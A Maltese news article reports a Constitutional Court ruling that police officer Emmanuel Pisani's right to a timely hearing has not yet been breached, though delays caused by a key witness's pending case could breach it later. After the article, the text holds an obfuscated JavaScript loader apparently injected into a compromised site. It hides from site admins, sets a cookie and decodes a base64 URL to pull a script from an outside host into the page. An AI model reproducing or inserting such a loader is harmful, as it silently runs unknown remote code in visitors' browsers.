Lokali Qorti

Sa issa għadu ma seħħx ksur ta’ drittijiet ta’ uffiċjal tal-Pulizija akkużat b’kompliċita ta’ frodi

Il-Prim Awla tal-Qorti Ċivili fil-ġurisdizzjoni Kostituzzjonali tagħha ma sabitx li diġà seħħ ksur tad-dritt ta’ Emmanuel Pisani li għal smigħ f’żmien raġonevoli. Madankollu, għamlet ċar li jekk dawn il-proċeduri jibqgħu ma jintemmux fi żmien raġonevoli, jista’ jqum il-possibbiltà ta’ ksur tad-drittijiet fundamentali tiegħu.

Dan il-każ jirrigwarda referenza kostituzzjonali magħmula minn Emanuel Pisani, uffiċjal tal-Pulizija akkużat f’kawża kriminali, b’kompliċità fi frodi u dikjarazzjonijiet foloz. Huwa kien qed jallega ksur tad-dritt fundamentali tiegħu għal smigħ xieraq fi żmien raġonevoli skont l-Artikolu 39 tal-Kostituzzjoni ta’ Malta u l-Artikolu 6 tal-Konvenzjoni Ewropea tad-Drittijiet tal-Bniedem.

Pisani, li ġie akkużat f’Diċembru tal-2020, sostna li l-proċeduri kontrih kienu qed jittardjaw b’mod eċċessiv minħabba l-fatt li l-prosekuzzjoni kienet qed tiddependi fuq ix-xhieda ta’ Norman Xuereb, xhud ewlieni li hu stess qed jiffaċċja proċeduri kriminali separati u li baqa’ jirrifjuta li jixhed.

Minkejja li l-maġġoranza tal-provi tal-prosekuzzjoni ġew ippreżentati, mill-2022 il-każ baqa’ wieqaf, billi l-Qorti kienet qed tistenna li jintemmu l-proċeduri kriminali kontra Xuereb. Pisani talab lill-Qorti tal-Maġistrati sabiex tirreferi l-kwistjoni lill-Qorti Kostituzzjonali, u din laqgħet it-talba iżda ma fformulatx il-mistoqsija kostituzzjonali b’mod ċar kif meħtieġ mir-regoli proċedurali.

L-Avukat Ġenerali u l-Avukat tal-Istat sostnew li r-referenza kienet difettuża mill-aspett proċedurali u li ma kien hemm l-ebda ħtieġa li ssir referenza kostituzzjonali, għaliex id-dewmien ma kienx tali li jwassal għal ksur ta’ drittijiet fundamentali u lanqas ma kellu jissospendi l-proċeduri oriġinali.

Madankollu, il-Qorti Kostituzzjonali ddeċidiet li, minkejja l-irregolaritajiet proċedurali, kienet tista’ teżamina l-każ fuq il-mertu tiegħu, billi d-drittijiet sostantivi m’għandhomx jiġu miċħuda għal raġunijiet tekniċi biss.

Filwaqt li eżaminat jekk id-dewmien kienx jammonta għal ksur tad-dritt għal smigħ f’żmien raġonevoli, il-Qorti applikat il-prinċipji stabbiliti li jikkunsidraw (i) il-kumplessità tal-każ, (ii) l-imġiba tal-partijiet, u (iii) l-aġir tal-awtoritajiet.

Il-Qorti osservat li d-dewmien — ta’ aktar minn tliet snin b’progress minimu — ma kienx imputabbli lil Pisani u lanqas mhux frott negliġenza mill-prosekuzzjoni, iżda ġie kkawżat mill-unika xhud li baqa’ ma setax jixhed.

Il-Qorti osservat li, f’dan l-istadju, għalkemm il-proċeduri kontra Norman Xuereb għadhom pendenti, jidher li jinsabu fi stadju avvanzat u li t-tmiem tagħhom qed joqrob. Għalhekk, il-Qorti ma sabitx li diġà seħħ ksur tad-dritt ta’ Emmanuel Pisani għal smigħ f’żmien raġonevoli.

Madankollu, għamlet ċar li jekk dawn il-proċeduri jibqgħu ma jintemmux fi żmien raġonevoli, jista’ jqum il-possibbiltà ta’ ksur tad-drittijiet fundamentali tiegħu. Għaldaqstant, ordnat li l-proċeduri quddiem il-Qorti tal-Maġistrati għandhom jerġgħu jibdew immedjatament mingħajr aktar dewmien, anke jekk ix-xhieda ta’ Xuereb għadha mhux disponibbli.

Il-Qorti awspikat li l-proċeduri pendenti kontra Xuereb jitmexxew bl-akbar ħeffa possibbli, u li l-prosekuzzjoni tagħmel kull sforz biex tenfasizza l-importanza li dawk il-proċessi jintemmu malajr. Madankollu, il-Qorti wissiet li jekk id-dewmien fil-proċeduri ta’ Xuereb jibqa’ sejjer, jista’ qajjem ksur tad-drittijiet fundamentali tal-imputat — iżda dan għadu ma seħħx skont l-evalwazzjoni tagħha f’dan l-istadju.

Barra minn hekk, il-Qorti semgħet is-sottomissjoni ta’ Pisani li l-prosekuzzjoni mexxiet b’mod differenti fil-każ taż-żewġ persuni l-oħra li kienu investigati flimkien miegħu, u li ġew liberati wara li l-każ tagħhom kien iggradwat fi proċedura oħra li ppermettiet li jitgħalaq mingħajr ix-xhieda ta’ Xuereb.

Minkejja dan, il-Qorti qalet li dan ma jfissirx li kien hemm dewmien esaġerat fil-każ ta’ Pisani. Id-differenza fil-mod kif tmexxew il-proċeduri tista’ tkun ġġustifikata jew le, iżda dan ma jaqax taħt il-mertu tar-riferiment li kellha quddiemha, u għaldaqstant ma ħaditx qies ulterjuri ta’ dawk is-sottomissjonijiet li jaqgħu barra mill-limiti ta’ dak li ġie riferut formalment.

Għaldaqstant, il-Qorti f’dan l-istadju ma sabitx ksur tad-dritt għal smigħ fi żmien raġonevoli, iżda ħalliet il-bieb miftuħ għal evalwazzjoni differenti jekk id-dewmien fil-proċeduri kontra Xuereb jibqa’ jippersisti.

(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();